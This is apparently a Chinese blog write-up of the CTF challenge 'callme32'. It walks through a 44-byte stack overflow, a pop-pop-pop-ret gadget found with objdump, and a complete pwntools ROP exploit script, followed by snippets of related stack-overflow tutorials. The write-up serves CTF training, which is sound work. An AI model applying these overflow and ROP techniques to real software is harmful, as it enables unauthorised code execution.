CTF-PWN-callme32 [ROP+栈溢出]

最新推荐文章于 2025-02-14 11:51:31 发布
最新推荐文章于 2025-02-14 11:51:31 发布
阅读量1k 收藏 4
点赞数
分类专栏: CTF-PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/getsum/article/details/99436556
版权
本文详细解析了在pwnme函数中利用缓冲区溢出进行ROP链构造的过程,通过精心安排函数调用顺序,成功解密flag并获取关键信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

首先发现在pwnme函数中有一个明显的缓冲区溢出,长度为40,经调试发现填入44长度的垃圾信息即可填入shellcode

ida发现一个重要函数如下: 

点入后发现这三个函数为系统级调用。正好题目给了我们一个.so文件。进入查看,发现有这三个函数的反编译。依次是将加密后的flag通过key1,key2解密。调用顺序应该是callme_one -> callme_two -> callme_three

 因此我的目标很明显:在栈中依次写入这几个函数的地址和其参数,然后依次调用即可。

注意在栈中,payload的排布规律为:函数地址 -> 函数返回地址 -> 函数参数

这是callme_one 函数的内容,其他两个函数与这个函数的结构类似。并且正确调用要求的参数都是1,2,3。

为了平衡堆栈,在函数调用完毕时,需要将这三个参数从栈中弹出,因此需要三个pop和一个ret的ROP。

supergate@ubuntu:~/Desktop/task1$ objdump -d callme32 | grep -A 3 pop
 8048579:	5b                   	pop    %ebx
 804857a:	c3                   	ret    

Disassembly of section .plt:
--
 8048642:	5e                   	pop    %esi
 8048643:	89 e1                	mov    %esp,%ecx
 8048645:	83 e4 f0             	and    $0xfffffff0,%esp
 8048648:	50                   	push   %eax
--
 80488a8:	5b                   	pop    %ebx
 80488a9:	5e                   	pop    %esi
 80488aa:	5f                   	pop    %edi
 80488ab:	5d                   	pop    %ebp
 80488ac:	c3                   	ret    
 80488ad:	8d 76 00             	lea    0x0(%esi),%esi

--
 80488c6:	5b                   	pop    %ebx
 80488c7:	c3                   	ret

 

发现从地址 0x80488a9 开始调用即可。

因此exp如下:

from pwn import *
p=process("./callme32")

payload='A'*44

payload+=p32(0x80485c0)+p32(0x80488a9)+p32(1)+p32(2)+p32(3)

payload+=p32(0x8048620)+p32(0x80488a9)+p32(1)+p32(2)+p32(3)

payload+=p32(0x80485b0)+p32(0x80488a9)+p32(1)+p32(2)+p32(3)

p.sendline(payload)

p.interactive()

 

得到flag 

CTF PWN简单栈溢出
2301_81031055的博客
01-25 614
(mov esp,ebp)意思是先将ebp赋给esp,此时esp与ebp位于同一个地址,可以把它们现在指向的那个地址,既可以当成栈顶又可以当成是栈底。因为填充的数据后面跟的就是栈,所以它会将栈地址顺带打印出来,接下来我们继续编写脚本。到这里,我们的第一次输入就算完成了,在第二次输入的时候就能去构造payload。(此时栈顶的内容也就是ebp的内容,也就是说现在把ebp的内容赋给了esp)在这里我们发现有system函数,我们可以利用system函数的plt表。我们会发现溢出字节较少,考虑用栈溢出解题。
一、pwn - 零基础ROP之Android ARM 32位篇(新修订,精华篇)
键盘的起始页
04-17 1170
一旦你知道了溢出的偏移量,你就可以构造一个包含NOP滑梯、shellcode以及用于覆盖PC的正确地址的有效载荷。你需要确保shellcode位于溢出点之后,并且PC被设置为指向NOP滑梯的开始部分,这样当执行流到达该位置时就会滑入你的shellcode并执行。使用模式创建工具来确定哪部分输入覆盖了程序计数器(PC),是一种常见的方法,特别是在开发缓冲区溢出漏洞利用时。当程序崩溃时,检查程序计数器(PC)的值。工具将输出一个数字,表示在模式中的偏移量,这个数字就是从输入数据的开始到覆盖PC的点的字节数。
CTFHub[PWN技能树]——栈溢出
mcmuyanga的博客
12-19 2771
文章目录一、ret2text二、ret2shellcode 一、ret2text 例行检查,64位程序,没有开启任何保护 本地运行一下情况,看看大概的情况 64位ida载入,检索程序里的字符串发现了bin/sh 要满足条件才可以执行,但是我们可以直接跳转到0x4007B8去system(‘/bin/sh’) 看main函数 第8行,gets函数读入没有限制数据的长度,明显的溢出,溢出ret到执行system(‘/bin/sh’)的地址即可 from pwn import * #p=proc
CTF PWN新手入门篇,PWN学习总结_ctf竞赛pwn
最新发布
bdfcfff77fa的博客
02-14 935
一什么是栈溢出栈溢出就是缓冲区溢出的一种。由于缓冲区溢出而使得有用的存储单元被改写,往往会引发不可预料的后果。程序在运行过程中,为了临时存取数据的需要,一般都要分配一些内存空间,通常称这些空间为缓冲区。如果向缓冲区中写入超过其本身长度的数据,以致于缓冲区无法容纳,就会造成缓冲区以外的存储单元被改写,这种现象就称为缓冲区溢出。缓冲区长度一般与用户自己定义的缓冲变量的类型有关。(PS:摘自百度百科)简单来说,就是程序没有检查用户输入的数据长度,导致攻击者覆盖栈上不是程序希望写入的地方,比如说返回地址。
CTF-PWN笔记(一)-- 栈溢出 之 基础ROP
CK_0ff的博客
01-09 5395
文章目录栈linux内存布局原理文件保护机制CanaryNXPIE(ASLR)RELRO简单的栈溢出(ret2txt)ret2shellcode 栈 栈是一种典型的后进先出 (Last in First Out) 的数据结构,其操作主要有压栈 (push) 与出栈 (pop) 两种操作,如下图所示(维基百科)。两种操作都操作栈顶,当然,它也有栈底。 高级语言在运行时都会被转换为汇编程序,在汇编程序运行过程中,充分利用了这一数据结构。每个程序在运行时都有虚拟地址空间,其中某一部分就是该程序对应的栈,用于保存
ctfhub pwn
m0_63253040的博客
09-09 339
被ida演了一波,gets不给参数,**********************给了system('/bin/sh')位置是0x4007B8。后来重新打开一遍就有了。
ROP;Ret2libc应用详解;CTF-pwn writeup;pwntools,one_gadget应用
CHERRY_cong的博客
05-01 724
ROP;Ret2libc; CTF-pwn题writeup;pwntools,one_gadget解题 pwn1 逆向代码 // IDA 7.5 int __cdecl main(int argc, const char **argv, const char **envp) { char buf[48]; // [rsp+0h] [rbp-30h] BYREF init(); puts("Show me your code :D"); gets(buf, argv); return 0
BUUCTF-PWN刷题记录-8
weixin_44145820的博客
04-16 970
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
PWN栈溢出基础——ROP1.0
Gifoyle的博客
07-13 976
PWN栈溢出基础——ROP1.0 这篇文章介绍ret2text,ret2shellcode,ret2syscall(基础篇) 在中间会尽量准确地阐述漏洞利用和exp的原理,并且尽量细致地将每一步操作写出来。 参考ctf-wiki以及其他资源,参考链接见最后,文中展示的题目下载链接见评论区 1.ret2text ret2text即控制程序执行程序本身已有的代码(.text)。其实,这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码(也就是gadgets
stack2 [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列15
重新启程
12-23 1483
题目地址:stack2 这是高手进阶区的第四题了,速度挺快啊,朋友!加油! 废话不说,看看题目先 没有什么特别的内容,那就看看保护机制 root@mypwn:/ctf/work/python/stack2# checksec fcca8ceb507544d1bd9c4a7925907a1d [*] '/ctf/work/python/stack2/fcca8ceb507544d1b...
CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1448
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
CTFhub pwn
清霂的博客
02-04 1411
这里写目录标题1.ret2text2.ret2shellcode 1.ret2text file checksec ida64 gets函数有栈溢出漏洞,题目为ret2text即返回到text段得到shell shift+f12打开字符串窗口,找到/bin/sh 点进去,选中/bin/sh,右键,交叉引用列表(可以找到使用/bin/sh的地方) 看到把/bin/sh放入rdi后,调用了system x64,64位系统中rdi,rsi,rdx,rcx,r8,r9作为调用函数的前6个参数,如果参数多于6
CTFHub pwn [FastBin Attack]
saulgoodman的博客
01-29 538
【代码】CTFHub pwn [FastBin Attack]
ROP Emporium-callme
网安星空
01-06 505
ROP Emporium网站CTF相关PWN靶场callme,主要是PWN栈溢出ROP技巧的练习
ctfhub 技能树pwn 栈溢出 ret2text
m0_75234353的博客
03-29 890
看到v4这个变量的缓冲区,我们要把数据溢出到覆盖返回地址,即0x70+8。选中该行,看到下方的地址(4007B8)看到gets危险函数,再点开其中的v4。再shift+f12 直接查看相关字符。可以看到无任何的栈保护。输入:wq 保存退出。
PWN】简单缓存区溢出
HAPPY
08-23 867
【解法】 拿到文件,查看伪代码,发现v4变量的地址是 -50h (也就是-80)  那么要想覆盖到key变量的地址,我们就得用ida分析获取输入的地址和key地址的相对差值了。。  得到v4的地址为-80,v5的地址为-4,-4--80)得到需要覆盖的字节为76 直接用python生成字符串提交得到flag。。  [学习资料] https://blog.youkuaiyun.com/u0...
XCTF-攻防世界CTF平台-PWN类——1、Mary_Morton(格式化字符串漏洞、缓冲区溢出漏洞)
Onlyone_1314的博客
09-09 1653
目录标题一级目录二级目录1、查看程序基本信息2、反编译程序3、攻击思路(1)先利用功能2格式化字符串漏洞(2)找到功能1的sub_400960()函数返回地址的位置方法二 一级目录 二级目录 1、查看程序基本信息 Mary_Morton程序,先用file查看: Linux下64位的ELF文件 再用checksec查看 程序开启了Partial RELRO、NX和Canary,没有PIE。程序开启了canary,就不能直接利用栈溢出覆盖返回地址了。因为在初始化一个栈帧时在栈底(stack overflow
ctf(pwn)栈溢出介绍
半岛铁盒的博客
03-05 1766
栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致 与其相邻的栈中的变量的值被改变。这种问题是一种特定的缓冲区溢出漏洞,类似的还有堆溢出,bss 段溢出等溢出方式。栈溢出漏洞轻则可以使程序崩溃,重则可以使攻击者控制程序执行流程。此外,我们也不难发现,发生栈溢出的基本前提是 程序必须向栈上写入数据。 写入的数据大小没有被良好地控制。 一般来说,我们会有如下的覆盖需求 覆盖函数返回地址,这时候就是直接看 EBP 即可。 覆盖栈上某个变量的内容,这时候就需要更加精细的.
32栈溢出exp
weixin_44932880的博客
10-13 624
32位程序 栈传参 栈结构 High Address | | +-----------------+ | args | +-----------------+ | return address | +-----------------+ ebp
CTFHub-技能树-pwn
01-01
### CTFHub Pwn 技能树教程与资源 Pwn 类型的挑战通常涉及利用程序中的漏洞来获取控制权。这类题目可以测试参赛者对二进制文件的理解以及逆向工程的能力。 在 CTF竞赛中,`pwntools` 是一个非常流行的 Python 库,用于开发针对这些类型的攻击工具[^3]。下面是一个简单的例子展示了如何使用 `pwntools` 进行远程连接并发送有效载荷: ```python from pwn import * p = remote("example.com", port_number) payload = b'a'*(buffer_size)+pack(address, 64) # 构造溢出字符串加上返回地址 p.sendline(payload) p.interactive() ``` 此代码片段显示了一个典型的缓冲区溢出攻击过程,其中构造特定长度的数据串去覆盖函数栈帧内的保存指针,并将其重定向到恶意指令处执行。 为了深入学习 pwn 技巧,在线社区提供了丰富的资源和支持材料。例如,《黑客&网络安全入门&进阶学习资源包》不仅涵盖了基础理论还包含了实际操作指南[^1]。此外,参与 CTF 比赛之后阅读优秀的 writeup 可以为理解不同场景下的解决方案提供很大帮助[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值